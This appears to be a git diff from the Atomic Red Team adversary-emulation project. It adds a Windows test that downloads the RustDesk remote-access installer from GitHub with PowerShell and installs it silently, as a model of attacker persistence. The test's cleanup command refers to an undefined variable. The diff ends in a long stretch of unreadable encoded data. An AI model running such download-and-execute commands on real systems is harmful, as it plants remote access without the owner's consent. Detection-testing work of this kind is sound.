Software,10,UltraVNC Execution,42e51815-a6cc-4c75-b970-3f0ff54b610e,powershell command-and-control,T1219,Remote Access Software,11,MSP360 Connect Execution,b1b8128b-c5d4-4de9-bf70-e60419274562,powershell +command-and-control,T1219,Remote Access Software,12,RustDesk Files Detected Test on Windows,f1641ba9-919a-4323-b74f-33372333bf0e,powershell command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 7e2c164db3..c47ca46a67 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1686,6 +1686,7 @@ - Atomic Test #9: UltraViewer - RAT Execution [windows] - Atomic Test #10: UltraVNC Execution [windows] - Atomic Test #11: MSP360 Connect Execution [windows] + - Atomic Test #12: RustDesk Files Detected Test on Windows [windows] - T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1572 Protocol Tunneling](../../T1572/T1572.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 185f388f25..b632082de9 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -1159,6 +1159,7 @@ - Atomic Test #9: UltraViewer - RAT Execution [windows] - Atomic Test #10: UltraVNC Execution [windows] - Atomic Test #11: MSP360 Connect Execution [windows] + - Atomic Test #12: RustDesk Files Detected Test on Windows [windows] - T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1572 Protocol Tunneling](../../T1572/T1572.md) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index ef25790853..b22fa9b157 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -71016,6 +71016,22 @@ command-and-control: ' name: powershell elevation_required: true + - name: RustDesk Files Detected Test on Windows + auto_generated_guid: f1641ba9-919a-4323-b74f-33372333bf0e + description: "An adversary may attempt to trick the user into downloading RustDesk + and use this to maintain access to the machine. \nDownload of RustDesk installer + will be at the destination location when successfully executed.\n" + supported_platforms: + - windows + executor: + command: |- + $file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe" + Invoke-WebRequest -OutFile $file https://github.com/rustdesk/rustdesk/releases/download/1.2.3-1/rustdesk-1.2.3-1-x86_64.exe + Start-Process -FilePath $file "/S" + cleanup_command: |- + $file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe" + Remove-Item $file1 -ErrorAction Ignore + name: powershell T1659: technique: modified: '2023-10-01T02:28:45.147Z' diff --git a/atomics/Indexes/windows-index.yaml b/atomics/Indexes/windows-index.yaml index 636f33218f..daee05922c 100644 --- a/atomics/Indexes/windows-index.yaml +++ b/atomics/Indexes/windows-index.yaml @@ -58415,6 +58415,22 @@ command-and-control: ' name: powershell elevation_required: true + - name: RustDesk Files Detected Test on Windows + auto_generated_guid: f1641ba9-919a-4323-b74f-33372333bf0e + description: "An adversary may attempt to trick the user into downloading RustDesk + and use this to maintain access to the machine. \nDownload of RustDesk installer + will be at the destination location when successfully executed.\n" + supported_platforms: + - windows + executor: + command: |- + $file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe" + Invoke-WebRequest -OutFile $file https://github.com/rustdesk/rustdesk/releases/download/1.2.3-1/rustdesk-1.2.3-1-x86_64.exe + Start-Process -FilePath $file "/S" + cleanup_command: |- + $file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe" + Remove-Item $file1 -ErrorAction Ignore + name: powershell T1659: technique: modified: '2023-10-01T02:28:45.147Z' diff --git a/atomics/T1219/T1219.md b/atomics/T1219/T1219.md index 88bd102da1..191ab84727 100644 --- a/atomics/T1219/T1219.md +++ b/atomics/T1219/T1219.md @@ -32,6 +32,8 @@ Installation of many remote access software may also include persistence (e.g., - [Atomic Test #11 - MSP360 Connect Execution](#atomic-test-11---msp360-connect-execution) +- [Atomic Test #12 - RustDesk Files Detected Test on Windows](#atomic-test-12---rustdesk-files-detected-test-on-windows) +
@@ -528,4 +530,40 @@ start-process "PathToAtomicsFolder\..\ExternalPayloads\msp360connect.exe" /S +
+
+ +## Atomic Test #12 - RustDesk Files Detected Test on Windows +An adversary may attempt to trick the user into downloading RustDesk and use this to maintain access to the machine. +Download of RustDesk installer will be at the destination location when successfully executed. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** f1641ba9-919a-4323-b74f-33372333bf0e + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +$file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe" +Invoke-WebRequest -OutFile $file https://github.com/rustdesk/rustdesk/releases/download/1.2.3-1/rustdesk-1.2.3-1-x86_64.exe +Start-Process -FilePath $file "/S" +``` + +#### Cleanup Commands: +```powershell +$file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe" +Remove-Item $file1 -ErrorAction Ignore +``` + + + + +

n_Nc#w@Y@Ga3{D9f8aK8n&W7K>8Gj_H=I^sUV8XO+E#Kt*P9*W| zkv)i2ztp-?o4N(R>x9L0z#_)uT)I?E_wRY?5_Q+=R`7Okm5_@W9fNH@bf8jq3Tx-W zhdUk-*qPRX?a{&b8BeYLBO$OG4KLIpHx^bF{b#jo4 z>NnM^B~g8DY$yfTh}I{g?eY)Q6?{@~Z0nFbg-J^yaRxqf4Msag!nbVT*1zz!3dftm z;Pdv;Hk#O<)QTyN-)7Xv5p;j@FMusxafFtwX^~vj8Q1eWyrK#(wcV(?0566$Hb^~9 zRUKAneV!}z^u6jHS3m!`nenHbZec8yd#w3agY+Te^5gU#E?uj#c;5mWksN>=Ti^1e z&UpRp0Ts`n(nDC|^~php{m2pgCen5>XC3{;CJ@$~zuB9~%koHkk%fOLP8Y50$HD@;2B6NktdJFV=m!R}#5xH0315pV zZhexExb=4~@Ym9-v0+p@=q?M`{2_4U)OhHvVXKiamy?OsMlj8S;QTK9C7NzJ**Q4h zn-|TUHuCuEc0%ZY74!A?@UhHZ7MFF1D7=So_5=joTT9y`>{Z3c{&Ua5p!W(nv&~3m z>%zY+w)&sGB(?AaOALwxpqo|nKl$@L(SII1Wn)k>_Gn$bew+v2fu#Q-Qo`Nb|2y2s zk!Twt5t(&mF(#tO4^p~rCp`01?w)la#_rKGZ33?rMt3`TAs#oO-;<*qGyAizK36*~ z?QuCOzf}&- zxM<1dCFEYRkN2d|qCa`ct^&a}A;%o14hV*CeG7ffxEO-if74gpV|(u)P(|mmz?*79 zrJZ(9b0&9pG#zaU$;EkcN7jmy{o>seik6P6B|lu&CPr`2~ad4$Jzt83SusV zzp=~j@%nzi()&ny+YBOA*CE7wA&Q3FijE0LQK;i5GR^?m*aFBw&LAlGgF;fuvn)_cIz-fq}FAQ&#Os*vZX7|1bTx5R=( z8mb@RLrNDmd$!zeVSIzxZ3@u#mp6s(m=JjR&SCPI&Oy8pQJ;RUb=JX+BOzy#)c=uc z1Q)FLb-fPLkL@M>dy@B=Z%(t3EvNq2SDShl18JIU{^7>f>OSe|Oa_AOAf;1g|ms5DQ+5h3=mbTv@UzdOgu68!{%4a@L5Ci^T1- zZ1VYbMD(Nc(OB>ZiIe=`MiJo$MRP`*`QiNcg0lyJcJ^-EZ~o$gQxsatVB=2!G2k>)@pA=9igkuS3&~y0N-;;w`QbYT8SU&(6;fUw%N_g?`wGCMUH@xKP z_uLH?51JErZ9GCPND*2OyzHg5h2o<})u6b$sH5F?5vU0A{xzddnxE$uH5q+?Yj8ov z7QQb;_i~Sl`eKYS3{>DqHSdc6_ozAfv+FJQ%`OMOy95MHT_$EUoxS7l)<>_!{k*Vd z>u!Odv^MP=N{nZET$Nt@dNGdmrxyrmx#6LSzAW&#IB$XRI;F>&oK3mIHe56!fBzqZ zlTFfA0xZ-cc`H25d0&%>MqT~}z$tQ^xc8UZrB0uuEw$eqRQ(Mg_&vMJj!U*Du{F*q zi9+QU$Mv+?A&mT7*euP-2}}hFPmhGfM^Y&N@^dxRIV3(~!^$oif^v@+KjERAodV!N zlPo!F<_!tI>}FQW%NUQRQL}t)=L~tfXq&5t1$jeLkOGgR*Z%RmnkDn!dvjC`0O^ss z2!PDtP!||t?+*y+Ec1iY%vIG^6hb0SPtV$s#*~0Z&-rJqP?5?fNg+v{i-e!QwJD^D z@D|cNIhl(56^8U;*h`x7evgM{6aUpmx#)%9i^D@&BizH6K13siNPco%*KBmy?r{J? zeb8ant6y0Ky%IUly8gv{E75FT~gF+9FpU_&@AZjCU7sO>Pt7Xg#-rv(hQJDAFDsK$R|rv9e$&LD)Q zhU^%}zr+@HzXX{LP-ZyEdFnb=-(m7Y2JH66o|hr``^T3!-INUCbn0O2MTmj>&=*uK zY3A|9dn0C67S6#0LOw=12+==kq{VpoDw`9{@z^h8pisEqmw`eRr)r`3r@rTZ)nWld z=%EB>`mGHRR?-)q@R)hl=24cwlvZ$D2c(0YS4ftfZsuyWwKTAYug)0WmK3}rZ}@sU zzyA4qkDox?2e<1ys>ie4e$D99);b;9!U{4^wAwmu=O@Uo%l88WhiE-jzpIA%eQ)fA z{`N2-JKw^zyT13lHmql$!(GQ_OYh1_a<^llZ0!JNkrwEoK)x;GE!mpQ>Q>*2+Y&XK zwXMDz@;JcW=RxEuBSY+KU?c$&Y(T%%fm#DpBOohJ*WhPnt6psKM%Kv*saMpQHw8s&*UOJDM3;R3s$^NTwD+UL z%S4D=k>(2&Tan$W{G)$iaSjvdSKwr_u-QaXN;`KG99`GSvXu|{<;mTvp0 z_OHLHb)*wtE3qL50CaQ4`1jI*+ z8Uxj6&V_znN6d~w#0ucXtQNz_j&@R?4;uv+3`ga^FLYcZjmnm=9|q*Hlw9hUp_dLW z)Qbn#7vzAzJ-yVh<@Xeu|3SYr0N=zTcUjWXf^eybWn2HEYas^fkzxU@lt0y8e^d>; zc>_%D;H^N|NW|(<0ey>`g%Ip@bj^OSGq2^YBk`>Bx#=<70W+rVG%V;sbdx6E`Vpf^mh)MVDsp>#GZu3^cM zLd=ptA?PkIX;WuiMtF7N<1o%C6)d4&J#-gk^c9$6$I85uggPBb^QkGww_{~pGt=!p zPmi0o%}KM|C+xhX9$-gQTc}qXM1$C?Sp92$(9LU zM`nBmbAv+XP-2O_b4Nh8FguQX`biMY;07_61KIA+it&f|B2x1C#>(AtF4AE)06_2-fFI0B*pvUCHIeOWOv>Z zH$lGk#JLD|f>yzQNSB&`?ch|=H{XpkQN^}rm)>fyFIxw+U#a*g34sxh{ADCv>G@eQ z{?+`IKf41|RHLx0(A0NRQ(4S(K=@;oej`Z4baun!i0wlvLgCl!2I<5dENuyV&#xkO z?tL+qw!fJgJpRN9XVlMAK^O`Vd3mgOQg>XC(5dHY6@L2rKt<^Lg!MMq`}uP-y}^PS zb;8k&^(Rz9@k6XpxrT%>R7`>eyWJ^d=iO5?n+Fe@em?tfxJNJR%;^X^eM%E#=9<$L76WS32eU%c}t>BVxK@oer!BQGX zGo|V}O6iHgoE6uapxC`Ek;$~=;>}f_am}$#9F}q~(5GqdUa*)nyJz6uI7Q)ygcJ1F zs`R+2LZ=UGigEF4rN(UM77g1wP&ytsA`&4`$F^=%nGNPynk~Jq=xAZ%5^6OOtET>uG3z*~C#~ zK64hCVf<1kCuC$PsEwAm$0Iz=zEr*<&h9GZ zR#h*Lio7EXQMT(>it1B+Fw)ctd*Ja}95sG&cQRO@J-r?yjj70v?L6unV*9>0ifHbDE0qoYHgshPq?jjPp``!oqXKPc8hlyBYjtzj=oK zb%aZKyUMp!=ay}SMN$=>C!Ne$fGLhGW1Rxo4;6w=3(p~*J;{!bq-r<)DIfX=Kc%E{ zhKGPJk&(z-U|t?ufy%cb@*@ufgy&Gtv{{#U2!s+zuvRxi&83&hVLu!2pM1VW87s@s z1*S;-TOJ+)u0*_*qfA8VS59z*=(;y6{8w3zqS?(*+W38R=pT!RFG!w4Teymdj-*0H zlkoW*cE6P?|H;a}9QhwDA%W9+wDB@WK5kJU2p~KMc?SMZeq)I&Sht&TTlhCeKI_wo zU2gdbrQxRybtk%muk+Z82#<@7842kq!O-^@pOjR!PY^DYF>N~x}^q9&#=%(KoScW;hL>8n$ zIlBl6fqzo4-+&)epa9OhaFRhi;Jl0UKBKu;fry9PQydxQb)U;ax�GidM6-?3HfY zUh31{Sjc2g4IA*v!zQ`ra3hvR54#zm)4xHS=T_ZbMl^Bq=ZV@IimZC(V(wF5g+?{+ zcXTk2Kglw?!sNXxnx3CFZxSBjhZ$F0|2ld{H_T6Jsb>G&`&^s@9--A+S<9*jh$_Dy zL@okT_;T5~EcvQx=y98u6W8iuHYHl?-tbKx29b?MFpJb9l?s2-$#gp zbZZF$HQ)gN6(&O=zXrd6?X4%6looo;HqZg0YmRXnpjJtjFC%O%<= zt@_@4gf<%Y8S8C4Qb?uduc(M_@3ktp)wMHZT;kD+#(p=o+n@OhwA$|QMP-h z3W+USqzUJmSF8(35lcuJz&m9)2(Q*`B6Jt}AM99PDMI%Qe8z`<2RfwFrjYCu;cT|v zL>d#jMPnBpvVt-Rro@h^T0VgJ$oO3}np;I5M{G*NulH-(z%SXp*( z^J}FJSY^s=bCcNRYqE#A6PPa7R0U@5xt8T$BQ9 zb_d7i?h5=5;Re2XS$*$$)w{^OOWG^JoNx2qbC0E?DSxI-qHFH^11q51j_*iNhBan(7NerBKF@~XTeo-Hv$%|pPfoz zDw|u0%IJAkO(z6biQ#Wq5bOfV$FSafgZfqXcFzn3^r3r2R2WrrcaY1O zB6SbpJwb~b%FX`9t;Jshn?>-cImd#4!sAv3iPy2;#7y(r5)1*$>9^Q}LE2BhR_xV; z=sm6Zn@EZoliWQvXdm%B=mNe#+<6x`m|;D#B9d7+cFB8X&Oe_2{z`ME>)ycE>nc?1 zENOO^ipniLnbocDs^+X^pH{!C#yfw4AWu8g(@0%o$Gz3@wW31v}l~yDMWt;kB;1n^6wj?zqfpE^gDJY*bnBDL zcHn;#c+DUg;qiQxTT!XJLcN?xjN@O;<`1M#P2Ju!_`I&+8p=!0UTBc$gq6^;2NhHKANbp>NxWFUI+((J6}K3ildTb%s>|71h`~bQ@Q_t3l2? zS^-7%8e;|e_X070s<9&_K8u5Yv=E;Cnhi`y%?Bg3-wo_1H`gGhllz{wRqt&xyQ&&V z-tNAcmrz%fbc9lg+}=LqDN8|BpmpL*F2n?V%q9^wqze=Q!BZGHuFJKouip|=!VA>?(^NLf6w|8HY`Q_jbd9@H`UA+i1UQOd$b}J|; zyhBnEf*jV(rn##Lv|L#@V+tsm3)^vnqsT4LiyAHxn}q7VVuMY#f)#=m z2^GttrdOh%+N`6@WrZ155mabk+`aq}Q;8lT2RDRAuoe`eabH0>Q}_^64^uLQ&A*vI zm#UAmr3=ll-J9>LuF5vBXS}7!pQGFuYTg`I3BD;xz*|}JQ4*=X)!WLqIm(S4u;Sr_ zlBj^qCV*sTSzNAQ>aymVXE0E#XEp_f^%}*LqVv_p>xL+d2P{FRil5Qnqd~m%FAnE` zJxp;~EmV<=2s@?i^z5>j8i;RYZ>@nkNejBAm&d(+(9||^T}2GmbY>GF_UBSj%Evwb znq5#b_s~GVe=s25r=PX-5n3X@!wvknv(h&V`hw7AkAE4P!0nomyW=W4SjmJREH60q zc@^*w{k9_5bdjShRm@{#lTi<9_g=gF1SP;!CgKq?#TmAe2e8ir#IL)HNg9usSPKDRW zW*}L&QQEB|j1(Y|u$qLT3c{N{ZjYRu`OfTu{ zuUxj$eX;wbo9Z);F7K@_q(xyF$UyDp7~b5tVwM08W=ZOnxKp5*x#ss6JO&wkEw&L! zs0$P-WCk*5gR#{mJ#kT#+ORm}Olhq$AvVCw-y0|hwovJ!xk1fVj;}UG#UUpa%WsPb z{E$4E>UxW{b|YAWc?oPPsl)dQB@|s<*ne=M%^~|rTMYH7VE#gomxlN$*k`eL@!Sr6 zmE&%=9nV#8@g$KYJ%JYV(_FFVk&vrm2Iy`}t|y5^QyOWh^w_%rB23xuN=q#*sIHh_ zeGJ&4Xy8;7Zd4y%Z99rJr4dIA^)q|pk+ufo&*7YiAZ{5PWFV=XbEh`KL_P@svbt4V zyu0LRxYG3>L#Z{A!%&$R@*hLeu5TIa;Id5J3tQv*c;toB2xkh>r)j?O!^qZ><3pGG zu>jD_Ewdsb$9BGuBG0K_E}!`;9_gO6x&|a1%YCAyRwx>L(a+ok$*H(!_B5o>*qK#5 z70ldDsxF#BHv+jt6TfiUnt8gx#R2BX@VMSl4y)^}y}uj)foe(E6XhBE6L*^u_@8e~ z+?liB(yS#m+j%;QpXON#5fVTAztTq-1oSs+Fj_*Rt9r%cV+gZ}-GyF0P(o3rR`>o+ zex}}k<-t8pe?g`@95xIl5mh{e#^`d*CYf_27Ypr0IYUDTxq*+Ph+)jRy^L_N-a8|? zTKC!!$dn;d3+1C#cz10l*~B5MKYEygiJA0pOw#?@A0kdny_;mSgP|?b_TO;0!CCr< zy5=PE?t|vAIipSd+b;875%R)BzxH{UqBU|o?Y$?^F4g-LFL-XD*YEBiF6uUQXm96q z7l5lf35B1WK_A^P_u1MGr7_3gxMy zSGWnHsvSBO21{BgTA+TG5YUxMIy%4q5+?OA|3dts5`t3Q!3659bk1Y^)|WbcF6$HP2r+c8P|-0jkHqsH<3jELDMtI& z`QlUdt(QPji4d7nq6yb7%y>USq{Fh2=kuGq#FFYP(i~bIshfAvk%9JA>-npJ%GV`r z(@>d^cw(>R;9>dfroVGQK?(6&txZjRc{f%L;h$;Mcn^^6iu+UEpUq6nYtu&MQTwjy zml{l6c-ryFmvt#Av1lz*AYnLZ#Yqt~_@wu_mNMZ{uZc`9z*4%4Rd9LbFg{P#hdYXiN8WmdKgZn4jAd@TT6 zfL&-3*o!Kd{S?0*B1j3D`dZL#046h~1Y4NKy`H|0FEy~%;6DKa;~BS+&<7SV4x6({ zv7nq|xpwWXVFsttD+7cweV=~Rs@>a(S=Kh-zc|r&+r;GF;CMW@k(9~qx3+-+JWVgL z%M8j;$$NgPrZL6k5BfsDVC+|8DY>wHijO4?_@O#}#Ng3cFu*Y}@5&lLECcgqP^x%H zb^w3RF^O9f%3zo^pYLfzfs^zy)g;(uw>l}5iR-k?VdY6N_I+C0a60Kmb+iHBV2h_d z*Xh-nC3}10yEw7xTMs*-A z9gFzXTDKf#K&JFmnVK6zO!N(q>A{eIQ;b(HZ#rSJcQK@m@`N z5kRVORTy&xyDz?BwdQM1VSZNnR3p~rcYB+VfO`!SmEqfFfPMyOTt@KkjVx0?>77!Z zYRk?VR!DNYzlq*5*5zukLYNPPnq|29un}Q=Y{qLZ%%@<3{)r9NIFvDxtZan06nVA#XSZ^e6v0~I-Uu-VP?(<@7z1L-rH+x8p{*5`?qjr z!pO@!$@8DjNc~vvm;T(Y>#7L%#Kl~XPvL<|Bzi?P@Gh*6|89~Ps<4B8ep?gIt$l~* z`NXY%l{{NerRT1BVFN6NY5lpDte_5&a_P>mZ{viXjK;04S^L8?$~5l5o{PLd4UEcS zcN`Eqg}mCBpzguy6jeb{7Ycr0OfnUGsTKq&HR=vL{vSM{qsi>2h3*+wj_wcdW^CFu zz6i)gDN^y3JDf${sH&j)RAP{GVv3cqdnJdJWbKWO?B>W z7AEU8avin8s_}OQpRqcb{4P?zG-2k}hX?lrF5n&;C9X3{!k*odRY-M|pC3(sJV4mj-}pinKG0}E0eYr`w1`ydxJ?Z6!q;MOsuW}mas z9i-E1?h?K}OzVEC0OwA0_SE@85@@Xni#c(X)3MduR|Ken>9Z=3Z z)}W>_{(WN5hOK-wC%ktx(D*&+&#K%>6TvcqGV+l{0UUY8fkfh#4BhY^oG?i)DIRiz z!)5K$f@4Vui7RCxr|TqA5tYx;MGt6GRJqe8??)vw!NteQZ)4qH&W0O&E;^^{92Ms- z6jhj-V%^#|uA6C(G9^7Vp7=GKa&ajMKE31yhZeY$SjITenu|Q1-Y(Rle>Xm!>#%XN z{=}q7k{G0W^lm+m>dq-w#6lS#{gOMb(zJWb!bxNs2Q|6=93%f5!jh<9e>BM`wnLz@ z3*$`~g`Ko0+S@wS8v}3+zQ?gIBse49`T94csf&L1=({&bu)8idR#OaS&~kka3TZxE z^4S9u1o z_oT3F0vEhJJr>_O>XAlay|FRK-9S1MAl{~k=jLy_XyG)Rm;yf!3Dv$KC*LnbE!7pg zxSGH)tG?60R>`6CFEWr}E*FJYqx44i|09)U>vbROHqoy|6L4|m$hRcs0N0pY1_5GJ zHc-2b&gYgG%blVuG4InH$B-QDHnKr+W6_xp+fxP_@!&CU6$&fw?w+|B9(s2#vjvFG zM#^NG=X>X{V?;Hp-zRdrXz?ziLZn5IGG%|9_F3bE4dXRrKj&1?gfC}-VVg3RvQ_|? zq?nKKf14aTfbA;OKbE<;gRCxH!Tw`3yShYJJIU4$EHxLs=vzS}U0s;gP6$J1glVex zlWn))=5Gmf-wi)M9yi$^w5HOV-IP@ZIPQ6SX?EB40(8yR45UtV$25yBLWO88>G%8{RUY2uH9vS^^lmio3rJt_KB+`>Ab6 zu9ZD|KcujorOG|~wMD}3RLi+`F-9S?ST`@^DdJ(fsLjvV!R+C=@(}EkQlTn%wU{Q( z==I*7rbeuc{(rE2?WwJ1s|UU0INeb*#am zO<@J;rkgR6Nj35hGq@EI?6Y4SM#dpgyLZF|?d1Hz*XHHt<{OolP&Uhl6uLy4q>olbjS8t zNEp#mLa@3dY3i_7VD?Vgg{^Om0nzhi+YwElo4?ctm~V@!j{AyN4j6s&01`?n{2rc6 z#i&WSA~S4nmaLNEdZ%B;;8TfG(`S4y2bZqr^Y`vDIe5 zz}~KX6RYURZ6f2Wn5ANow6u2`iy)A3aRg!^HWHR zA*DwUGB1=LwuaX+3@qPBCzH18Zl+T`TG>XfWraTQwAE6-xi^ib!E)Q8j#e!x4bIiG z9_s`3x}YhhelU0Chg$Ps!^)q))|rCF;jbzIMv%(pt;SZpmd1umlF+()olqvq08&l^ ze49~f&!WVUddQUNqA-8VBSMaX>RW0TInMGNK8I|SPOxiLDhe1k@``&x$fF5OWhKv< zg`k66gO%KS&$Utu7*6(a(=d6a9H)=f>$3_gsk14=Ax_-N0K?7F=F5!?-C$XF6@18g zd%aL5$Kz_GzKsgs-f@)B%VLc~ zON8U&&Wp$I9@xIhqWn32i(ORd25d8O?W9>cd|2(H8LjHN%hF}CaO|v0MWXlvMLFx+ ztJc8VCIT||g)HXbN|qxsS~SJfIIL9eb;s{G?H(5e*)9sLc9Q8-@dD}d$fRQYh)rAc z0H303@zBa?XK8y6Y#XAn^{Z)S@+TGW}D>WBkI!0_v^ywFG?3GF+;b4SqK9-UGZ zH&QaNO+@R zFw#NVw)=x|Kk0X*e-#;)i?EOoGKOwC^Cu`_(|!9CzP>7;j+9AN#*KOS%q<2Rhx`hX zYOb~rn-pE9KNwNrh)r1?R8d;XUH#LX_wUhWzlD$(=Pyb)6`aR|hbpf@+)v=!HI3_6 zGWEEATGEe}$TlGk^wda)svu2ZXi=7usMO;^5(-k2?F>h#q%BE@h~1aljA&TB*W=S? z8GhWNy8fE4*fuJ~p&fhkf;P(&MMqMy);%?gw_)z%A@0DId)x8j4zQu*T*%0#qiOOh zt7!lALveQ^4*;C4E2oV~#1C}INNuJYo)x;=&8)87?gb68e-Mb7?g2wvH2f_Wf@5HN zI`xgco0x2F+gBc|#T6vZSsbt}f%2{9y zx`gcW{{pP~$lJcB-9vdNyW87NF|e2)>`Y2R?h=F~DlnRT*_yL0YT- z>vY30vI%Dz(Ldn{l(8*Xg1iu&Ax<3Zn_@TvczZ=~g9z_B=sPotmQ>!g3vs$_b!5E! z+kwcmJlR-#k{S=HZ_bN9V}}E=MqdcPsz3Y`nF4Bpq+b(t6*2s9M65eF@yC8Q9Q-14 z#hE0%&^PmU6=PAHz5WfxZFNfsku^3gNH|Mv*zRVA4E?<`we6-Sy6fr~63U?Beo-do z{3$$v$3>AzTa<=u!aTi6n^c}Y`)8HGyO_m38$LZ{0w-*a@S#QusidXGskl+`~zkz$QXt*J8QQ4rfO(o{M!j1z6`*0SP?;Y>F3~lp|ASd z!`bFL`#P6fS;5oS`a<=@-)r}VS&7%;2Q=LIhLA%`gp}F77q{Mr1UR5a`UE9HHw(Ve zX@48g#;==j?~(*#``IQ5+|pRkqAx}CG60KK?i8UQ2*?;ir->x zrfqqPF!!Y=-8B8*l=^`q+zMZ(4t$r<2WcaDI@FhMlo2AVM?=bp#2ArUOHX^fwwZ_Wq*=|9}y-U36&*5GG&*9Wabm~;NPs~x{7 zy;nOXU&N*|&~!_ea_xQ2%*(V38GoU{zlXCnsra_%{|Gg#7#WQkJl*gl;6ru8@m!o} z4vF}qz5zOk`lsz4{SV^*p)&h0n*DVSVd<^q&N@+mFdAv({`)H9`Qc%{;`Khf&g72S zyFhfApq+i%BP&rM21{BivGNNy3UzBnSqO-FX_d*1g0)rtuwxvXiRYb>n2b|%Lmqr* ze#2bnZ*`m`e}cl(8m3lZpD!A(;efSn*%xRBwQea=yEOdtYRfLoz4mzP?#hhE z%yKUTHQUh6k7CNqRP;VYiq(M{SGMYtN>2|KFST0@!e`>jpsbT_=(1fJpf1br1E5Z! z;#Ug$bLB&Y-_<|QHHiJbI&*}qIBl!p%{!CaN?f^J<6b?OLP(WH-9)k_ty}}(>|*z< zzcfm~wBl?QhEOM+Be(^5D-b<&3tzDvC=F!$G(4=QQOK>*?TRRrVMA6ujcL=cT|R(E zO!?<1B5?{crPD(!sS(!hXpNO3Qg!~<*qzZv_p56O{3Owggp(*#tD+EJhsNJpv)y?r z0`o%PP6zzfDQWK=&R@+6z@=s7Vobh7qJE~j+YB}K{^=Q@+Ml}*zGqSU*V{@j6rddE`7#eED*S}8yQU73UebBn}hSvv|lGzKLo3% z7Xs4WjLixY8RmW{T?%n~^u9JIZu~;@KR=`6Fzq)T&&A<0T{@R>M_cTkPc}42WHUgW##F!_O(!y3i>h}QF^Jo+Xdz@r61+Fs z7^e%E&Xfh~F*jEaSZeEX%GJH=1+oe-OxI5J_=@j%_Yf#vu%vZueeFKze!v(tM=nY( zU<8wcOs8NWx$H^FQ+6uI_3EJ&!C}TsW_HW)k*&6rII0TFFTl6XODv&*7sOLmys%Vo3q_@xk;i`a5pXe_JkO0Qp^kag3MWqHAx!TSO*DkFeCN)8fGqB!lH@FnyU4vxitN3S z+M!&ZV^{N2khZ6048OG_;g^>_Qjafa#v#RqJ~cm*YJzmg8t~n3fA-Rt6k@cLVyQ`o z8Na083x4HV%RYPiz`X-xfSVCs{36d(6Gp^3P$yQhey!QJb#AdNi`Q*_BukT7Xvu(z zIqsz$=Q~VgoBtd&A}B6Ob>?i2M}{gZKeydz-^r<303ID2lTWh> zaALPVo1<*zEA2gpG{JKY4EHY09qe^H2X76435I(L|3l&_tJPHd;B+NKyX;7SCnLcp zWmB(>wh4=X4`!g|%-59uhp;C9hd};^$kc^yx}R+qi}`z@W%^eKs&_PL=0R`?JBj{w z`}$r{X190VUbZ`pg{TDvlY3& zfkH1eZ08w{9-3PuA9Zqqc+m+?PDo-fR|+`)Z(zHdS_s^B)KU$II@bQba<*I)3C;t4 z6J4fGh-o?{WRx(xXnuLwf8#(nefs67g9NfYFHK?{n~F;VAI}Z(sLB4dG7+VU62*y` zkSW_Vmc~QENVY8a6R^F#9R*0u$TQ#gF###t8SBhOK|Ipu3Xg*33O3uXXv8V4w?Iz9 z+w>>&@^jVK>Br>BeCzZ^r(4D?Kv5nvvI?WqO)TCdbt=Q(t{L9tWoj37v>hGAXa}?J z$taoft@MJ@R9lXMQ5M0LCp+M^WSHna=}RT@p*CxZjuhRe_l;+%b+M9%DO2AA8aVS} zj-Q4{!_N2@ByxF8L#>PAdC=TqCE*j2`}R`ETw*zBr)L6@&8iXr&p~ZA`css^0fhdP z#s^f+HK$zf$3&ebU(KS?h7@OUWCLOW4Yux1KTihZY7QFLYq7YKwUk;L@Q1mJ{i}^L zdr50LX)BG|;HbH)wTw{F;A8Y!sv9FK_;PT6NCVSIL$o)VG;7l`d3@vgeXFypt2^T% zd5v@VBPKud~#0`IRCSb`EW&S_@v)S zgke^4$aB!2AmbfOaGKcsuY3!7ZOg8TPszOcv$IC4*%QSG-jxX2{_)vX*#g-DY9DIV z7ORFhY^yiZjcisT|A4<5$7x{N^Kn~zG=(C()t`_8Dx3eWYwVTL{*WR7;LtkYPH zu)wpVU0sgUdk%K7NmOG_Jm|&lE9HGfX|PkaZkyga;}ME*T5&@A_4)k;R@i5~>+^80 znjW{$?4jFE@Y{XQuPAadgS|Ru{Yac+Orj=Jz}xfl?_JHw%I43;SaeAO$@&qu2cx3x zQ-RV&5TC!e_RzneZ?}nhwHQXjYV+4a;9Km@Gphz~O8`yoZC4Ib&C@D~VdTCwXv3{) zVK3pM#Hif5cC!kj-h7lnE*?~U!fRpCk@WXZf!6_X^ja-ilQy-NZe1m4p*(2Ix-nsS zLujcMWIti(ULzpNl5DkgNnoxa2B=eGSJ6W@pwxoo(`!Q_PKEemkj2<|#GQzz06nw*^=BNB6D~*UAV3 